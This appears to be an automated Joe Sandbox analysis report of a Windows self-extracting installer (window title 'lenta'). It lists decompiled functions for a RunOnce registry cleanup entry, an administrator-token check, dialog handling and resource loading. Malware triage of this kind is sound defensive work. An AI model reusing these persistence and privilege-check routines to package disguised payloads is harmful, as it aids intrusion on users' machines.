                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A722A3
                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00A722D8
                              • memset.MSVCRT ref: 00A722F5
                              • GetSystemDirectoryA.KERNEL32 ref: 00A72305
                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A7236E
                              • RegCloseKey.ADVAPI32(?), ref: 00A7237A
                              Strings
                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A7232D
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A72321
                              • wextract_cleanup1, xrefs: 00A7227C, 00A722CD, 00A72363
                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A72299
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                              • API String ID: 3027380567-2601155950
                              • Opcode ID: 4d17449e160fc15c7b54c254d5d216dc163fb628b4ac3fe056bb345cf2ee3a39
                              • Instruction ID: f03128d3fcf0fd66ae39513eda642b73b2ec82562f742ba78af9846d5a15e976
                              • Opcode Fuzzy Hash: 4d17449e160fc15c7b54c254d5d216dc163fb628b4ac3fe056bb345cf2ee3a39
                              • Instruction Fuzzy Hash: D431C571A002187BDB21DB60DC49FEF7B7CFB54700F00C5A9B50DAA051EA74AB8ACB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E00A73100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* _t8;
                              				void* _t11;
                              				void* _t15;
                              				struct HWND__* _t16;
                              				struct HWND__* _t33;
                              				struct HWND__* _t34;
                              
                              				_t8 = _a8 - 0xf;
                              				if(_t8 == 0) {
                              					if( *0xa78590 == 0) {
                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                              						 *0xa78590 = 1;
                              					}
                              					L13:
                              					return 0;
                              				}
                              				_t11 = _t8 - 1;
                              				if(_t11 == 0) {
                              					L7:
                              					_push(0);
                              					L8:
                              					EndDialog(_a4, ??);
                              					L9:
                              					return 1;
                              				}
                              				_t15 = _t11 - 0x100;
                              				if(_t15 == 0) {
                              					_t16 = GetDesktopWindow();
                              					_t33 = _a4;
                              					E00A743D0(_t33, _t16);
                              					SetDlgItemTextA(_t33, 0x834,  *0xa78d4c);
                              					SetWindowTextA(_t33, "lenta");
                              					SetForegroundWindow(_t33);
                              					_t34 = GetDlgItem(_t33, 0x834);
                              					 *0xa788b8 = GetWindowLongA(_t34, 0xfffffffc);
                              					SetWindowLongA(_t34, 0xfffffffc, E00A730C0);
                              					return 1;
                              				}
                              				if(_t15 != 1) {
                              					goto L13;
                              				}
                              				if(_a12 != 6) {
                              					if(_a12 != 7) {
                              						goto L9;
                              					}
                              					goto L7;
                              				}
                              				_push(1);
                              				goto L8;
                              			}









                              0x00a73108
                              0x00a7310b
                              0x00a731b7
                              0x00a731ca
                              0x00a731d0
                              0x00a731d0
                              0x00a731da
                              0x00000000
                              0x00a731da
                              0x00a73111
                              0x00a73114
                              0x00a73136
                              0x00a73136
                              0x00a73138
                              0x00a7313b
                              0x00a73141
                              0x00000000
                              0x00a73143
                              0x00a73116
                              0x00a7311b
                              0x00a7314b
                              0x00a73151
                              0x00a73158
                              0x00a7316a
                              0x00a73176
                              0x00a7317d
                              0x00a7318b
                              0x00a7319e
                              0x00a731a3
                              0x00000000
                              0x00a731ad
                              0x00a73120
                              0x00000000
                              0x00000000
                              0x00a7312a
                              0x00a73134
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a73134
                              0x00a7312c
                              0x00000000

                              APIs
                              • EndDialog.USER32(?,00000000), ref: 00A7313B
                              • GetDesktopWindow.USER32 ref: 00A7314B
                              • SetDlgItemTextA.USER32(?,00000834), ref: 00A7316A
                              • SetWindowTextA.USER32(?,lenta), ref: 00A73176
                              • SetForegroundWindow.USER32(?), ref: 00A7317D
                              • GetDlgItem.USER32(?,00000834), ref: 00A73185
                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00A73190
                              • SetWindowLongA.USER32(00000000,000000FC,00A730C0), ref: 00A731A3
                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A731CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: lenta
                              • API String ID: 3785188418-2780258678
                              • Opcode ID: 48aa877716716c5f64d2deaa3dabff397c144ea1f270a437f86d55603e6ab855
                              • Instruction ID: 6b51e0b9cca7e3f451eb5762dd6d914920633900c662f0fffc523d224311263f
                              • Opcode Fuzzy Hash: 48aa877716716c5f64d2deaa3dabff397c144ea1f270a437f86d55603e6ab855
                              • Instruction Fuzzy Hash: 2011AF32244211BBEF119BA49C0CB9E3B64FB9A721F91C720F81D951E1DB748682E782
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E00A718A3(void* __edx, void* __esi) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				char _v20;
                              				long _v24;
                              				void* _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t23;
                              				long _t45;
                              				void* _t49;
                              				int _t50;
                              				void* _t52;
                              				signed int _t53;
                              
                              				_t51 = __esi;
                              				_t49 = __edx;
                              				_t23 =  *0xa78004; // 0x74742267
                              				_v8 = _t23 ^ _t53;
                              				_t25 =  *0xa78128; // 0x2
                              				_t45 = 0;
                              				_v12 = 0x500;
                              				_t50 = 2;
                              				_v16.Value = 0;
                              				_v20 = 0;
                              				if(_t25 != _t50) {
                              					L20:
                              					return E00A76CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                              				}
                              				if(E00A717EE( &_v20) != 0) {
                              					_t25 = _v20;
                              					if(_v20 != 0) {
                              						 *0xa78128 = 1;
                              					}
                              					goto L20;
                              				}
                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                              					goto L20;
                              				}
                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                              					L17:
                              					CloseHandle(_v28);
                              					_t25 = _v20;
                              					goto L20;
                              				} else {
                              					_push(__esi);
                              					_t52 = LocalAlloc(0, _v24);
                              					if(_t52 == 0) {
                              						L16:
                              						_pop(_t51);
                              						goto L17;
                              					}
                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                              						L15:
                              						LocalFree(_t52);
                              						goto L16;
                              					} else {
                              						if( *_t52 <= 0) {
                              							L14:
                              							FreeSid(_v32);
                              							goto L15;
                              						}
                              						_t15 = _t52 + 4; // 0x4
                              						_t50 = _t15;
                              						while(EqualSid( *_t50, _v32) == 0) {
                              							_t45 = _t45 + 1;
                              							_t50 = _t50 + 8;
                              							if(_t45 <  *_t52) {
                              								continue;
                              							}
                              							goto L14;
                              						}
                              						 *0xa78128 = 1;
                              						_v20 = 1;
                              						goto L14;
                              					}
                              				}
                              			}


















                              0x00a718a3
                              0x00a718a3
                              0x00a718ab
                              0x00a718b2
                              0x00a718b5
                              0x00a718be
                              0x00a718c0
                              0x00a718c6
                              0x00a718c7
                              0x00a718ca
                              0x00a718cf
                              0x00a719c9
                              0x00a719d8
                              0x00a719d8
                              0x00a718df
                              0x00a719b8
                              0x00a719bd
                              0x00a719bf
                              0x00a719bf
                              0x00000000
                              0x00a719bd
                              0x00a718fa
                              0x00000000
                              0x00000000
                              0x00a71912
                              0x00a719aa
                              0x00a719ad
                              0x00a719b3
                              0x00000000
                              0x00a71927
                              0x00a71927
                              0x00a71932
                              0x00a71936
                              0x00a719a9
                              0x00a719a9
                              0x00000000
                              0x00a719a9
                              0x00a7194c
                              0x00a719a2
                              0x00a719a3
                              0x00000000
                              0x00a7196e
                              0x00a71970
                              0x00a71999
                              0x00a7199c
                              0x00000000
                              0x00a7199c
                              0x00a71972
                              0x00a71972
                              0x00a71975
                              0x00a71984
                              0x00a71985
                              0x00a7198a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7198c
                              0x00a71991
                              0x00a71996
                              0x00000000
                              0x00a71996
                              0x00a7194c

                              APIs
                                • Part of subcall function 00A717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A718DD), ref: 00A7181A
                                • Part of subcall function 00A717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A7182C
                                • Part of subcall function 00A717EE: AllocateAndInitializeSid.ADVAPI32(00A718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A718DD), ref: 00A71855
                                • Part of subcall function 00A717EE: FreeSid.ADVAPI32(?,?,?,?,00A718DD), ref: 00A71883
                                • Part of subcall function 00A717EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A718DD), ref: 00A7188A
                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A718EB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A718F2
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A7190A
                              • GetLastError.KERNEL32 ref: 00A71918
                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A7192C
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A71944
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A71964
                              • EqualSid.ADVAPI32(00000004,?), ref: 00A7197A
                              • FreeSid.ADVAPI32(?), ref: 00A7199C
                              • LocalFree.KERNEL32(00000000), ref: 00A719A3
                              • CloseHandle.KERNEL32(?), ref: 00A719AD
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                              • String ID:
                              • API String ID: 2168512254-0
                              • Opcode ID: f9c2b685375ed3d163e6b3cf2014ff11dd35e5a7f0c5047233bebb78bbda4c9f
                              • Instruction ID: 04ba124c64cbe6b465839ca94805d563cf538a91ad1486e95cb1b66bf170c6f4
                              • Opcode Fuzzy Hash: f9c2b685375ed3d163e6b3cf2014ff11dd35e5a7f0c5047233bebb78bbda4c9f
                              • Instruction Fuzzy Hash: 63311B71A00209ABDB20DFE9DC58AAFBBFCFB54701F10C829E649E2150E7349947CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E00A7468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                              				long _t4;
                              				void* _t11;
                              				CHAR* _t14;
                              				void* _t15;
                              				long _t16;
                              
                              				_t14 = __ecx;
                              				_t11 = __edx;
                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                              				_t16 = _t4;
                              				if(_t16 <= _a4 && _t11 != 0) {
                              					if(_t16 == 0) {
                              						L5:
                              						return 0;
                              					}
                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                              					FreeResource(_t15);
                              					return _t16;
                              				}
                              				return _t4;
                              			}








                              0x00a74699
                              0x00a7469b
                              0x00a746a9
                              0x00a746af
                              0x00a746b4
                              0x00a746bc
                              0x00a746f9
                              0x00000000
                              0x00a746f9
                              0x00a746d9
                              0x00a746dd
                              0x00000000
                              0x00000000
                              0x00a746e5
                              0x00a746ef
                              0x00000000
                              0x00a746f5
                              0x00a746ff

                              APIs
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                              • SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                              • LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                              • LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                              • memcpy_s.MSVCRT ref: 00A746E5
                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID: TITLE$lenta
                              • API String ID: 3370778649-2035842925
                              • Opcode ID: 5947f082518b7b0ee07d468af74b59a5ad0bc13a5227856d13745dd182d016ae
                              • Instruction ID: e96d4993ce87199eb11c1323a9f619721ebf327fb19b1c7d00199a5ff5892227
                              • Opcode Fuzzy Hash: 5947f082518b7b0ee07d468af74b59a5ad0bc13a5227856d13745dd182d016ae
                              • Instruction Fuzzy Hash: 6C0186362442107BE31067E56C4DF6F7E2CEBDAB52F04C414FA4D96191DA61888287A6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 57%
                              			E00A717EE(intOrPtr* __ecx) {
                              				signed int _v8;
                              				short _v12;
                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                              				_Unknown_base(*)()* _v20;
                              				void* _v24;
                              				intOrPtr* _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t14;
                              				_Unknown_base(*)()* _t20;
                              				long _t28;
                              				void* _t35;
                              				struct HINSTANCE__* _t36;
                              				signed int _t38;
                              				intOrPtr* _t39;
                              
                              				_t14 =  *0xa78004; // 0x74742267
                              				_v8 = _t14 ^ _t38;
                              				_v12 = 0x500;
                              				_t37 = __ecx;
                              				_v16.Value = 0;
                              				_v28 = __ecx;
                              				_t28 = 0;
                              				_t36 = LoadLibraryA("advapi32.dll");
                              				if(_t36 != 0) {
                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                              					_v20 = _t20;
                              					if(_t20 != 0) {
                              						 *_t37 = 0;
                              						_t28 = 1;
                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                              							_t37 = _t39;
                              							 *0xa7a288(0, _v24, _v28);
                              							_v20();
                              							if(_t39 != _t39) {
                              								asm("int 0x29");
                              							}
                              							FreeSid(_v24);
                              						}
                              					}
                              					FreeLibrary(_t36);
                              				}
                              				return E00A76CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                              			}



















                              0x00a717f6
                              0x00a717fd
                              0x00a71805
                              0x00a7180b
                              0x00a7180d
                              0x00a71815
                              0x00a71818
                              0x00a71820
                              0x00a71824
                              0x00a7182c
                              0x00a71832
                              0x00a71837
                              0x00a71851
                              0x00a71854
                              0x00a7185d
                              0x00a71862
                              0x00a7186c
                              0x00a71872
                              0x00a71877
                              0x00a7187e
                              0x00a7187e
                              0x00a71883
                              0x00a71883
                              0x00a7185d
                              0x00a7188a
                              0x00a7188a
                              0x00a718a2

                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A718DD), ref: 00A7181A
                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A7182C
                              • AllocateAndInitializeSid.ADVAPI32(00A718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A718DD), ref: 00A71855
                              • FreeSid.ADVAPI32(?,?,?,?,00A718DD), ref: 00A71883
                              • FreeLibrary.KERNEL32(00000000,?,?,?,00A718DD), ref: 00A7188A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: e5527b148367d20f9999d75380589b3211050909ebdb7b1702ce6d55341a1bc6
                              • Instruction ID: f65898f1fedbbada9ef169f74b1a57620fe3276da7b4513a0350f86002db7699
                              • Opcode Fuzzy Hash: e5527b148367d20f9999d75380589b3211050909ebdb7b1702ce6d55341a1bc6
                              • Instruction Fuzzy Hash: 99116A71F00205BBDB10DFE4DC49ABEB7B8FF44701F108569F919E6290DA709D468791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t7;
                              				void* _t11;
                              				struct HWND__* _t12;
                              				int _t22;
                              				struct HWND__* _t24;
                              
                              				_t7 = _a8 - 0x10;
                              				if(_t7 == 0) {
                              					EndDialog(_a4, 2);
                              					L11:
                              					return 1;
                              				}
                              				_t11 = _t7 - 0x100;
                              				if(_t11 == 0) {
                              					_t12 = GetDesktopWindow();
                              					_t24 = _a4;
                              					E00A743D0(_t24, _t12);
                              					SetWindowTextA(_t24, "lenta");
                              					SetDlgItemTextA(_t24, 0x838,  *0xa79404);
                              					SetForegroundWindow(_t24);
                              					goto L11;
                              				}
                              				if(_t11 == 1) {
                              					_t22 = _a12;
                              					if(_t22 < 6) {
                              						goto L11;
                              					}
                              					if(_t22 <= 7) {
                              						L8:
                              						EndDialog(_a4, _t22);
                              						return 1;
                              					}
                              					if(_t22 != 0x839) {
                              						goto L11;
                              					}
                              					 *0xa791dc = 1;
                              					goto L8;
                              				}
                              				return 0;
                              			}








                              0x00a73459
                              0x00a7345c
                              0x00a734d8
                              0x00a734de
                              0x00000000
                              0x00a734e0
                              0x00a7345e
                              0x00a73463
                              0x00a7349a
                              0x00a734a0
                              0x00a734a7
                              0x00a734b2
                              0x00a734c4
                              0x00a734cb
                              0x00000000
                              0x00a734cb
                              0x00a73468
                              0x00a7346e
                              0x00a73474
                              0x00000000
                              0x00000000
                              0x00a7347c
                              0x00a7348c
                              0x00a73490
                              0x00000000
                              0x00a73496
                              0x00a73484
                              0x00000000
                              0x00000000
                              0x00a73486
                              0x00000000
                              0x00a73486
                              0x00000000

                              APIs
                              • EndDialog.USER32(?,?), ref: 00A73490
                              • GetDesktopWindow.USER32 ref: 00A7349A
                              • SetWindowTextA.USER32(?,lenta), ref: 00A734B2
                              • SetDlgItemTextA.USER32(?,00000838), ref: 00A734C4
                              • SetForegroundWindow.USER32(?), ref: 00A734CB
                              • EndDialog.USER32(?,00000002), ref: 00A734D8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$DialogText$DesktopForegroundItem
                              • String ID: lenta
                              • API String ID: 852535152-2780258678
                              • Opcode ID: 65c71bc73fe9b4634a1fc88e38e777b7396ab6de52202818fc9bbe16cec76a26
                              • Instruction ID: 9528f6f1dc72f00c18de99c067ae0e1f0c2344ce70be86f39c8f06305d9a3538
                              • Opcode Fuzzy Hash: 65c71bc73fe9b4634a1fc88e38e777b7396ab6de52202818fc9bbe16cec76a26
                              • Instruction Fuzzy Hash: 8501B533250114BBDB1E9FA5DC0C96E3B64EB45702F51C121FA4E865A0C7718F92EB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E00A72AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				int _t21;
                              				char _t32;
                              				intOrPtr _t34;
                              				char* _t38;
                              				char _t42;
                              				char* _t44;
                              				CHAR* _t52;
                              				intOrPtr* _t55;
                              				CHAR* _t59;
                              				void* _t62;
                              				CHAR* _t64;
                              				CHAR* _t65;
                              				signed int _t66;
                              
                              				_t60 = __edx;
                              				_t16 =  *0xa78004; // 0x74742267
                              				_t17 = _t16 ^ _t66;
                              				_v8 = _t16 ^ _t66;
                              				_t65 = _a4;
                              				_t44 = __edx;
                              				_t64 = __ecx;
                              				if( *((char*)(__ecx)) != 0) {
                              					GetModuleFileNameA( *0xa79a3c,  &_v268, 0x104);
                              					while(1) {
                              						_t17 =  *_t64;
                              						if(_t17 == 0) {
                              							break;
                              						}
                              						_t21 = IsDBCSLeadByte(_t17);
                              						 *_t65 =  *_t64;
                              						if(_t21 != 0) {
                              							_t65[1] = _t64[1];
                              						}
                              						if( *_t64 != 0x23) {
                              							L19:
                              							_t65 = CharNextA(_t65);
                              						} else {
                              							_t64 = CharNextA(_t64);
                              							if(CharUpperA( *_t64) != 0x44) {
                              								if(CharUpperA( *_t64) != 0x45) {
                              									if( *_t64 == 0x23) {
                              										goto L19;
                              									}
                              								} else {
                              									E00A71680(_t65, E00A717C8(_t44, _t65),  &_v268);
                              									_t52 = _t65;
                              									_t14 =  &(_t52[1]); // 0x2
                              									_t60 = _t14;
                              									do {
                              										_t32 =  *_t52;
                              										_t52 =  &(_t52[1]);
                              									} while (_t32 != 0);
                              									goto L17;
                              								}
                              							} else {
                              								E00A765E8( &_v268);
                              								_t55 =  &_v268;
                              								_t62 = _t55 + 1;
                              								do {
                              									_t34 =  *_t55;
                              									_t55 = _t55 + 1;
                              								} while (_t34 != 0);
                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                              									 *_t38 = 0;
                              								}
                              								E00A71680(_t65, E00A717C8(_t44, _t65),  &_v268);
                              								_t59 = _t65;
                              								_t12 =  &(_t59[1]); // 0x2
                              								_t60 = _t12;
                              								do {
                              									_t42 =  *_t59;
                              									_t59 =  &(_t59[1]);
                              								} while (_t42 != 0);
                              								L17:
                              								_t65 =  &(_t65[_t52 - _t60]);
                              							}
                              						}
                              						_t64 = CharNextA(_t64);
                              					}
                              					 *_t65 = _t17;
                              				}
                              				return E00A76CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                              			}






















                              0x00a72aac
                              0x00a72ab7
                              0x00a72abc
                              0x00a72abe
                              0x00a72ac3
                              0x00a72ac6
                              0x00a72ac9
                              0x00a72ace
                              0x00a72ae6
                              0x00a72bdc
                              0x00a72bdc
                              0x00a72be0
                              0x00000000
                              0x00000000
                              0x00a72af2
                              0x00a72afc
                              0x00a72b00
                              0x00a72b05
                              0x00a72b05
                              0x00a72b0b
                              0x00a72bca
                              0x00a72bd1
                              0x00a72b11
                              0x00a72b18
                              0x00a72b26
                              0x00a72b99
                              0x00a72bc8
                              0x00000000
                              0x00000000
                              0x00a72b9b
                              0x00a72bae
                              0x00a72bb3
                              0x00a72bb5
                              0x00a72bb5
                              0x00a72bb8
                              0x00a72bb8
                              0x00a72bba
                              0x00a72bbb
                              0x00000000
                              0x00a72bb8
                              0x00a72b28
                              0x00a72b2e
                              0x00a72b33
                              0x00a72b39
                              0x00a72b3c
                              0x00a72b3c
                              0x00a72b3e
                              0x00a72b3f
                              0x00a72b55
                              0x00a72b5d
                              0x00a72b64
                              0x00a72b64
                              0x00a72b7a
                              0x00a72b7f
                              0x00a72b81
                              0x00a72b81
                              0x00a72b84
                              0x00a72b84
                              0x00a72b86
                              0x00a72b87
                              0x00a72bbf
                              0x00a72bc1
                              0x00a72bc1
                              0x00a72b26
                              0x00a72bda
                              0x00a72bda
                              0x00a72be6
                              0x00a72be6
                              0x00a72bf8

                              APIs
                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A72AE6
                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A72AF2
                              • CharNextA.USER32(?), ref: 00A72B12
                              • CharUpperA.USER32 ref: 00A72B1E
                              • CharPrevA.USER32(?,?), ref: 00A72B55
                              • CharNextA.USER32(?), ref: 00A72BD4
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                              • String ID:
                              • API String ID: 571164536-0
                              • Opcode ID: 3574363019855b714b3ae9130582135810cd5af1ab4de0e5af0ea9d6c4cae943
                              • Instruction ID: 9c810bf8a4634cdb2d9daf5aec2f2c95906a66c213afa1468d166c732d521c6f
                              • Opcode Fuzzy Hash: 3574363019855b714b3ae9130582135810cd5af1ab4de0e5af0ea9d6c4cae943
                              • Instruction Fuzzy Hash: BA4105356082856EDB159F348C54BFD7BA99FD6300F14C19AE8CA87202DB358E87CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00A743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                              				signed int _v8;
                              				struct tagRECT _v24;
                              				struct tagRECT _v40;
                              				struct HWND__* _v44;
                              				intOrPtr _v48;
                              				int _v52;
                              				intOrPtr _v56;
                              				int _v60;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				void* _t53;
                              				intOrPtr _t56;
                              				int _t59;
                              				struct HWND__* _t63;
